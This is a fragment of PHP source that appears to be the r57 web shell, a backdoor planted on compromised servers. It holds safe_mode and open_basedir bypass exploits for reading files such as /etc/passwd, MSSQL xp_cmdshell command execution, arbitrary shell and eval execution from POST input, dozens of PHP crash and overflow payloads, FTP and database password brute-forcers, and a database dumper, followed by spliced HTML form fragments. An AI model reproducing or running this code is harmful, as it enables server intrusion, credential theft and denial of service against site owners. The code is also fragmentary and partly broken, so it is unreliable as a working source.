Not Found

if($safe_mode || $open_basedir)

{

switch($_POST['cmd'])

{

case 'safe_dir':

if (@function_exists('scandir') && ($d=@scandir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath']))

{

foreach ($d as $file)

{

if ($file=="." || $file=="..") continue;

@clearstatcache();

@list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);

if(!$unix){

echo date("d.m.Y H:i",$mtime);

if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);

}

else{

if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){

$owner = @posix_getpwuid($uid);

$grgid = @posix_getgrgid($gid);

}else{$owner['name']=$grgid['name']='';}

echo $inode." ";

echo perms(@fileperms($file));

@printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);

echo @date("d.m.Y H:i ",$mtime);

}

echo "$file\n";

}

elseif (@function_exists('dir') && ($d=@dir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath']))

{

while (false!==($file=$d->read()))

{

if ($file=="." || $file=="..") continue;

@clearstatcache();

@list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);

if(!$unix){

echo date("d.m.Y H:i",$mtime);

if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);

}

else{

if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){

$owner = @posix_getpwuid($uid);

$grgid = @posix_getgrgid($gid);

}else{$owner['name']=$grgid['name']='';}

echo $inode." ";

echo perms(@fileperms($file));

@printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);

echo @date("d.m.Y H:i ",$mtime);

}

echo "$file\n";

}

$d->close();

}

elseif (@function_exists('opendir') && @function_exists('readdir') && ($d=@opendir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath']))

{

while (false!==($file=@readdir($d)))

{

if ($file=="." || $file=="..") continue;

@clearstatcache();

@list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);

if(!$unix){

echo date("d.m.Y H:i",$mtime);

if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);

}

else{

if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){

$owner = @posix_getpwuid($uid);

$grgid = @posix_getgrgid($gid);

}else{$owner['name']=$grgid['name']='';}

echo $inode." ";

echo perms(@fileperms($file));

@printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);

echo @date("d.m.Y H:i ",$mtime);

}

echo "$file\n";

}

@closedir($d);

}

elseif(@function_exists('glob') && (isset($_POST['glob']) || !isset($_POST['realpath'])))

{

echo "PHP glob() listing directory Safe_mode bypass Exploit\r\n\r\n";

function eh($errno, $errstr, $errfile, $errline)

{

global $D, $c, $i;

preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);

if($o){ $D[$c] = $o[2]; $c++;}

}

$error_reporting = @ini_get('error_reporting');

error_reporting(E_WARNING);

@ini_set("display_errors", 1);

@ini_alter("display_errors", 1);

$root = "/";

if($dir) $root = $dir;

$c = 0; $D = array();

@set_error_handler("eh");

$chars = "_-.0123456789abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";

for($i=0; $i < strlen($chars); $i++)

{

$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";

$prevD = $D[count($D)-1];

@glob($path."*");

if($D[count($D)-1] != $prevD)

{

for($j=0; $j < strlen($chars); $j++)

{

$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";

$prevD2 = $D[count($D)-1];

@glob($path."*");

if($D[count($D)-1] != $prevD2)

{

for($p=0; $p < strlen($chars); $p++)

{

$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";

$prevD3 = $D[count($D)-1];

@glob($path."*");

if($D[count($D)-1] != $prevD3)

{

for($r=0; $r < strlen($chars); $r++)

{

$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";

@glob($path."*");

}

$D = array_unique($D);

foreach($D as $item) echo "{$item}\r\n";

echo "\r\n Generation time: ".round(@getmicrotime()-starttime,4)." sec\r\n";

error_reporting($error_reporting);

}

elseif(@function_exists('realpath') && (!isset($_POST['glob']) || isset($_POST['realpath'])))

{

echo "PHP realpath() listing directory Safe_mode bypass Exploit\r\n\r\n";

if(!$dir){$dir='/etc/';};

if(!empty($_POST['end_rlph'])){$end_rlph=$_POST['end_rlph'];}else{$end_rlph='';}

if(!empty($_POST['n_rlph'])){$n_rlph=$_POST['n_rlph'];}else{$n_rlph='3';}

if($realpath=realpath($dir.'/')){echo $realpath."\r\n";}

if($end_rlph!='' && $realpath=realpath($dir.'/'.$end_rlph)){echo $realpath."\r\n";}

foreach($presets_rlph as $preset_rlph){

if($realpath=realpath($dir.'/'.$preset_rlph.$end_rlph)){echo $realpath."\r\n";}

}

for($i=0; $i < strlen($chars_rlph); $i++){

if($realpath=realpath($dir."/{$chars_rlph[$i]}".$end_rlph)){echo $realpath."\r\n";}

if($n_rlph<=1){continue;};

for($j=0; $j < strlen($chars_rlph); $j++){

if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}".$end_rlph)){echo $realpath."\r\n";}

if($n_rlph<=2){continue;};

for($x=0; $x < strlen($chars_rlph); $x++){

if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}".$end_rlph)){echo $realpath."\r\n";}

if($n_rlph<=3){continue;};

for($y=0; $y < strlen($chars_rlph); $y++){

if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}".$end_rlph)){echo $realpath."\r\n";}

if($n_rlph<=4){continue;};

for($z=0; $z < strlen($chars_rlph); $z++){

if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}".$end_rlph)){echo $realpath."\r\n";}

if($n_rlph<=5){continue;};

for($w=0; $w < strlen($chars_rlph); $w++){

if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}{$chars_rlph[$w]}".$end_rlph)){echo $realpath."\r\n";}

}

echo "\r\n Generation time: ".round(@getmicrotime()-starttime,4)." sec\r\n";

}

else echo $lang[$language.'_text29'];

break;

case 'test1':

$ci = @curl_init("file://".$_POST['test1_file']);

$cf = @curl_exec($ci);

echo htmlspecialchars($cf);

break;

case 'test2':

@include($_POST['test2_file']);

break;

case 'test3':

if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }

$db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);

if($db)

{

if(@mysql_select_db($_POST['test3_md'],$db))

{

@mysql_query("DROP TABLE IF EXISTS temp_r57_table");

@mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");

/*     @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");*/

@mysql_query("LOAD DATA LOCAL INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");

$r = @mysql_query("SELECT * FROM temp_r57_table");

while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; }

@mysql_query("DROP TABLE IF EXISTS temp_r57_table");

}

else echo "[-] ERROR! Can't select database";

@mysql_close($db);

}

else echo "[-] ERROR! Can't connect to mysql server";

break;

case 'test4':

if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }

$db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);

if($db)

{

if(@mssql_select_db($_POST['test4_md'],$db))

{

@mssql_query("drop table r57_temp_table",$db);

@mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);

@mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);

$res = mssql_query("select * from r57_temp_table",$db);

while(($row=@mssql_fetch_row($res)))

{

echo htmlspecialchars($row[0])."\r\n";

}

@mssql_query("drop table r57_temp_table",$db);

}

else echo "[-] ERROR! Can't select database";

@mssql_close($db);

}

else echo "[-] ERROR! Can't connect to MSSQL server";

break;

case 'test5':

$temp=tempnam($dir, "fname");

if (@file_exists($temp)) @unlink($temp);

$extra = "-C ".$_POST['test5_file']." -X $temp";

@mb_send_mail(NULL, NULL, NULL, NULL, $extra);

$str = moreread($temp);

echo htmlspecialchars($str);

@unlink($temp);

break;

case 'test6':

$stream = @imap_open('/etc/passwd', "", "");

$dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");

for ($i = 0; $i < count($dir_list); $i++) echo htmlspecialchars($dir_list[$i])."\r\n";

@imap_close($stream);

break;

case 'test7':

$stream = @imap_open($_POST['test7_file'], "", "");

$str = @imap_body($stream, 1);

echo htmlspecialchars($str);

@imap_close($stream);

break;

case 'test8':

$temp=@tempnam($_POST['test8_file2'], "copytemp");

$str = readzlib($_POST['test8_file1'],$temp);

echo htmlspecialchars($str);

@unlink($temp);

break;

case 'test9':

@ini_restore("safe_mode");

@ini_restore("open_basedir");

$str = moreread($_POST['test9_file']);

echo htmlspecialchars($str);

break;

case 'test10':

@ob_clean();

$error_reporting = @ini_get('error_reporting');

error_reporting(E_ALL ^ E_NOTICE);

@ini_set("display_errors", 1);

@ini_alter("display_errors", 1);

$str=@fopen($_POST['test10_file'],"r");

while(!feof($str)){print htmlspecialchars(fgets($str));}

fclose($str);

error_reporting($error_reporting);

break;

case 'test11':

@ob_clean();

$temp = 'zip://'.$_POST['test11_file'];

$str = moreread($temp);

echo htmlspecialchars($str);

break;

case 'test12':

@ob_clean();

$temp = 'compress.bzip2://'.$_POST['test12_file'];

$str = moreread($temp);

echo htmlspecialchars($str);

break;

case 'test13':

@error_log($_POST['test13_file1'], 3, "php://../../../../../../../../../../../".$_POST['test13_file2']);

echo $lang[$language.'_text61'];

break;

case 'test14':

@session_save_path($_POST['test14_file2']."\0;$tempdir");

@session_start();

@$_SESSION[php]=$_POST['test14_file1'];

echo $lang[$language.'_text61'];

break;

case 'test15':

@readfile($_POST['test15_file1'], 3, "php://../../../../../../../../../../../".$_POST['test15_file2']);

echo $lang[$language.'_text61'];

break;

case 'test16':

if (@fopen('srpath://../../../../../../../../../../../'.$_POST['test16_file'],"a")) echo $lang[$language.'_text61'];

break;

case 'test17_1':

@unlink('symlinkread');

@symlink('a/a/a/a/a/a/', 'dummy');

@symlink('dummy/../../../../../../../../../../../'.$_POST['test17_file'], 'symlinkread');

@unlink('dummy');

while (1)

{

@symlink('.', 'dummy');

@unlink('dummy');

}

break;

case 'test17_2':

$str='';

while (strlen($str) < 3) {

/*   $str = moreread('symlinkread');*/

$str = @file_get_contents('symlinkread');

if($str){ @ob_clean(); echo htmlspecialchars($str);}

}

break;

case 'test17_3':

$dir = $files = array();

if(@version_compare(@phpversion(),"5.0.0")>=0){

while (@count($dir) < 3) {

$dir=@scandir('symlinkread');

if (@count($dir) > 2) {@ob_clean(); @print_r($dir); }

}

else {

while (@count($files) < 3) {

$dh  = @opendir('symlinkread');

while (false !== ($filename = @readdir($dh))) {

$files[] = $filename;

}

if(@count($files) > 2){@ob_clean(); @print_r($files); }

}

break;

case 'test18':

@putenv("TMPDIR=".$_POST['test18_file2']);

@ini_set("session.save_path", "");

@ini_alter("session.save_path", "");

@session_start();

@$_SESSION[php]=$_POST['test18_file1'];

echo $lang[$language.'_text61'];

break;

case 'test19':

if(empty($_POST['test19_port'])) { $_POST['test19_port'] = "3306"; }

$m = new mysqli('localhost',$_POST['test19_ml'],$_POST['test19_mp'],$_POST['test19_md'],$_POST['test19_port']);

if(@mysqli_connect_errno()){ echo "[-] ERROR! Can't connect to mysqli server: ".mysqli_connect_error() ;};

$m->options(MYSQLI_OPT_LOCAL_INFILE, 1);

$m->set_local_infile_handler("r");

$m->query("DROP TABLE IF EXISTS temp_r57_table");

$m->query("CREATE TABLE temp_r57_table ( 'file' LONGBLOB NOT NULL )");

$m->query("LOAD DATA LOCAL INFILE \"".$_POST['test19_file']."\" INTO TABLE temp_r57_table");

$r = $m->query("SELECT * FROM temp_r57_table");

while(($r_sql = @mysqli_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; }

$m->query("DROP TABLE IF EXISTS temp_r57_table");

$m->close();

break;

}

if((!$safe_mode) && ($_POST['cmd']!="php_eval") && ($_POST['cmd']!="mysql_dump") && ($_POST['cmd']!="db_query") && ($_POST['cmd']!="ftp_brute") && ($_POST['cmd']!="db_brute")){

$cmd_rep = ex($_POST['cmd']);

if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }

else { echo @htmlspecialchars($cmd_rep)."\n"; }

}/*elseif($safe_mode){

$cmd_rep = safe_ex($_POST['cmd']);

if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }

else { echo @htmlspecialchars($cmd_rep)."\n"; }

}

switch($_POST['cmd'])

{

case 'dos1':

function a() { a(); } a();

break;

case 'dos2':

@pack("d4294967297", 2);

break;

case 'dos3':

$a = "a";@unserialize(@str_replace('1', 2147483647, @serialize($a)));

break;

case 'dos4':

$t = array(1);while (1) {$a[] = &$t;};

break;

case 'dos5':

@dl("sqlite.so");$db = new SqliteDatabase("foo");

break;

case 'dos6':

preg_match('/(.(?!b))*/', @str_repeat("a", 10000));

break;

case 'dos7':

@str_replace("A", str_repeat("B", 65535), str_repeat("A", 65538));

break;

case 'dos8':

@shell_exec("killall -11 httpd");

break;

case 'dos9':

function cx(){ @tempnam("/www/", '../../../../../..'.$tempdir.'cx'); cx(); } cx();

break;

case 'dos10':

$a = @str_repeat ("A",438013);$b = @str_repeat ("B",951140);@wordwrap ($a,0,$b,0);

break;

case 'dos11':

@array_fill(1,123456789,"Infigo-IS");

break;

case 'dos12':

@substr_compare("A","A",12345678);

break;

case 'dos13':

@unserialize("a:2147483649:{");

break;

case 'dos14':

$Data = @str_ireplace("\n", "<br>", $Data);

break;

case 'dos15':

function toUTF($x) {return chr(($x >> 6) + 192) . chr(($x & 63) + 128);}

$str1 = "";for($i=0; $i < 64; $i++){ $str1 .= toUTF(977);}

@htmlentities($str1, ENT_NOQUOTES, "UTF-8");

break;

case 'dos16':

$r = @zip_open("x.zip");$e = @zip_read($r);$x = @zip_entry_open($r, $e);

for ($i=0; $i<1000; $i++) $arr[$i]=array(array(""));

unset($arr[600]);@zip_entry_read($e, -1);unset($arr[601]);

break;

case 'dos17':

$z = "UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU";

$y = "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD";

$x = "AQ                                                                        ";

unset($z);unset($y);$x = base64_decode($x);$y = @sqlite_udf_decode_binary($x);unset($x);

break;

case 'dos18':

$MSGKEY = 519052;$msg_id = @msg_get_queue ($MSGKEY, 0600);

if (!@msg_send ($msg_id, 1, 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH', false, true, $msg_err))

echo "Msg not sent because $msg_err\n";

if (@msg_receive ($msg_id, 1, $msg_type, 0xffffffff, $_SESSION, false, 0, $msg_error)) {

echo "$msg\n";

} else { echo "Received $msg_error fetching message\n"; break; }

@msg_remove_queue ($msg_id);

break;

case 'dos19':

$url = "php://filter/read=OFF_BY_ONE./resource=/etc/passwd"; @fopen($url, "r");

break;

case 'dos20':

$hashtable = str_repeat("A", 39);

$hashtable[5*4+0]=chr(0x58);$hashtable[5*4+1]=chr(0x40);$hashtable[5*4+2]=chr(0x06);$hashtable[5*4+3]=chr(0x08);

$hashtable[8*4+0]=chr(0x66);$hashtable[8*4+1]=chr(0x77);$hashtable[8*4+2]=chr(0x88);$hashtable[8*4+3]=chr(0x99);

$str = 'a:100000:{s:8:"AAAABBBB";a:3:{s:12:"0123456789AA";a:1:{s:12:"AAAABBBBCCCC";i:0;}s:12:"012345678AAA";i:0;s:12:"012345678BAN";i:0;}';

for ($i=0; $i<65535; $i++) { $str .= 'i:0;R:2;'; }

$str .= 's:39:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:39:"'.$hashtable.'";i:0;R:3;';

@unserialize($str);

break;

case 'dos21':

imagecreatetruecolor(1234,1073741824);

break;

case 'dos22':

imagecopyresized(imagecreatetruecolor(0x7fffffff, 120),imagecreatetruecolor(120, 120), 0, 0, 0, 0, 0x7fffffff, 120, 120, 120);

break;

case 'dos23':

$a = str_repeat ("A",9989776); $b = str_repeat("/", 2798349); iconv_substr($a,0,1,$b);

break;

case 'dos24':

setlocale(LC_COLLATE, str_repeat("A", 34438013));

break;

case 'dos25':

glob(str_repeat("A", 9638013));

break;

case 'dos26':

glob("a",-1);

break;

case 'dos27':

fnmatch("*[1]e", str_repeat("A", 9638013));

break;

case 'dos28':

if (extension_loaded("gd")){ $buff = str_repeat("A",9999); $res = imagepsloadfont($buff); echo "boom!!\n";}

break;

case 'dos29':

if(function_exists('msql_connect')){ msql_pconnect(str_repeat('A',49424).'BBBB'); msql_connect(str_repeat('A',49424).'BBBB');}

break;

case 'dos30':

$a=str_repeat("A", 65535);  $b=1;  $c=str_repeat("A", 65535);  chunk_split($a,$b,$c);

break;

case 'dos31':

if (extension_loaded("win32std") ) { win_browse_file( 1, NULL, str_repeat( "\x90", 264 ), NULL, array( "*" => "*.*" ) );}

break;

case 'dos32':

if (extension_loaded( "iisfunc" ) ){ $buf_unicode = str_repeat( "A", 256 ); $eip_unicode = "\x41\x41"; iis_getservicestate( $buf_unicode . $eip_unicode );}

break;

case 'dos33':

$buff = str_repeat("\x41", 250);$get_EIP = "\x42\x42";$get_ESP = str_repeat("\x43", 100);$get_EBP = str_repeat("\x44", 100);ntuser_getuserlist($buff.$get_EIP.$get_ESP.$get_EBP);

break;

case 'dos34':

if (extension_loaded("bz2")){ $buff = str_repeat("a",1000); com_print_typeinfo($buff);}

break;

case 'dos35':

$a = str_repeat("/", 4199000); iconv(1, $a, 1);

break;

case 'dos36':

$a = str_repeat("/", 2991370); iconv_mime_decode_headers(0, 1, $a);

break;

case 'dos37':

$a = str_repeat("/", 3799000); iconv_mime_decode(1, 0, $a);

break;

case 'dos38':

$a = str_repeat("/", 9791999); iconv_strlen(1, $a);

break;

}

if ($_POST['cmd']=="php_eval"){

$eval = @str_replace("<?","",$_POST['php_eval']);

$eval = @str_replace("?>","",$eval);

@eval($eval);}

if ($_POST['cmd']=="ftp_brute")

{

$suc = 0;

if($_POST['brute_method']=='passwd'){

foreach($users as $user)

{

$connection = @ftp_connect($ftp_server,$ftp_port,10);

if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }

else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }

@ftp_close($connection);

}

}else if(($_POST['brute_method']=='dic') && isset($_POST['ftp_login'])){

foreach($users as $user)

{

$connection = @ftp_connect($ftp_server,$ftp_port,10);

if(@ftp_login($connection,$_POST['ftp_login'],$user)) { echo "[+] ".$_POST['ftp_login'].":$user - success\r\n"; $suc++; }

@ftp_close($connection);

}

echo "\r\n-------------------------------------\r\n";

$count = count($users);

if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; }

echo $lang[$language.'_text97'].$count."\r\n";

echo $lang[$language.'_text98'].$suc."\r\n";

}

if ($_POST['cmd']=="db_brute")

{

$suc = 0;

if($_POST['brute_method']=='passwd'){

foreach($users as $user)

{

$sql = new my_sql();

$sql->db   = $_POST['db'];

$sql->host = $_POST['db_server'];

$sql->port = $_POST['db_port'];

$sql->user = $user;

$sql->pass = $user;

if($sql->connect()) { echo "[+] $user:$user - success\r\n"; $suc++; }

}

if(isset($_POST['reverse']))

{

foreach($users as $user)

{

$sql = new my_sql();

$sql->db   = $_POST['db'];

$sql->host = $_POST['db_server'];

$sql->port = $_POST['db_port'];

$sql->user = $user;

$sql->pass = strrev($user);

if($sql->connect()) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; }

}

}else if(($_POST['brute_method']=='dic') && isset($_POST['mysql_l'])){

foreach($users as $user)

{

$sql = new my_sql();

$sql->db   = $_POST['db'];

$sql->host = $_POST['db_server'];

$sql->port = $_POST['db_port'];

$sql->user = $_POST['mysql_l'];

$sql->pass = $user;

if($sql->connect()) { echo "[+] ".$_POST['mysql_l'].":$user - success\r\n"; $suc++; }

}

echo "\r\n-------------------------------------\r\n";

$count = count($users);

if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; }

echo $lang[$language.'_text97'].$count."\r\n";

echo $lang[$language.'_text98'].$suc."\r\n";

}

if ($_POST['cmd']=="mysql_dump")

{

if(isset($_POST['dif'])) { morewrite($_POST['dif_name'], "mysql_dump\r\n"); }

$sql = new my_sql();

$sql->db   = $_POST['db'];

$sql->host = $_POST['db_server'];

$sql->port = $_POST['db_port'];

$sql->user = $_POST['mysql_l'];

$sql->pass = $_POST['mysql_p'];

$sql->base = $_POST['mysql_db'];

if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }

else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }

else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }

else {

if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }

else if(@is_writable($_POST['dif_name'])){ foreach($sql->dump as $v){ morewrite($_POST['dif_name'], $v."\r\n");} }

else { echo "[-] ERROR! Can't write in dump file"; }

}

echo "

Directive	Local Value	Master Value
'.ws(3).''.$key.'	'.U_value($value['local_value']).'	'.U_value($value['global_value']).'

".$ts; echo sr(20,"".$lang[$language.'_text30'].$arrow."",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe); echo $te."	".$ts; echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_2').in('submit','submit',0,$lang[$language.'_butt8']).$fe); echo $te."
".$ts; echo sr(20,"".$lang[$language.'_text4'].$arrow."",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe); echo $te."	".$ts; echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_3').in('submit','submit',0,$lang[$language.'_butt8']).$fe); echo $te."
".$ts; echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile1',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile2',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile3',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile4',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile5',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile6',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile7',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile8',35,'')); echo $te."	".$ts; echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile9',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile10',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile11',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile12',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile13',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile14',35,'')); echo sr(15,"".$lang[$language.'_text6'].$arrow."",in('file','userfile15',35,'')); echo sr(15,'',in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); echo $te."
".$ts; echo "".$lang[$language.'_text94']." "; echo sr(25,"".$lang[$language.'_text88'].$arrow."",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').in('hidden','dir',0,$dir)); echo sr(25,"",in('radio','brute_method',0,'passwd',1)."".$lang[$language.'_text99']." ( ".$lang[$language.'_text95']." )"); echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']); echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']); echo sr(25,"".$lang[$language.'_text37'].$arrow."",in('text','ftp_login',0,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("root")))); echo sr(25,"".$lang[$language.'_text135'].$arrow."",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'passw.dic')))); echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt1'])); echo $te."	".$ts; echo "".$lang[$language.'_text87']." "; echo sr(25,"".$lang[$language.'_text88'].$arrow."",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); echo sr(25,"".$lang[$language.'_text37'].$arrow."",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); echo sr(25,"".$lang[$language.'_text38'].$arrow."",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); echo sr(25,"".$lang[$language.'_text89'].$arrow."",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down')); echo sr(25,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',20,$dir)); echo sr(25,"".$lang[$language.'_text90'].$arrow."","".in('hidden','dir',0,$dir)); echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14'])); echo $te."	".$ts; echo "".$lang[$language.'_text100']." "; echo sr(25,"".$lang[$language.'_text88'].$arrow."",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); echo sr(25,"".$lang[$language.'_text37'].$arrow."",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); echo sr(25,"".$lang[$language.'_text38'].$arrow."",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); echo sr(25,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',20,$dir)); echo sr(25,"".$lang[$language.'_text89'].$arrow."",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up')); echo sr(25,"".$lang[$language.'_text90'].$arrow."","".in('hidden','dir',0,$dir)); echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2'])); echo $te."

'.ws(3).''.trim($info[0]).'	'.trim($info[1]).'
'.ws(3).' ---

".ws(3); $r .= (!$unix)? str_replace("/","\\",$file) : $file; $r .= ""; $r .= "
".$a."	".ws(2).$b."

Access Denied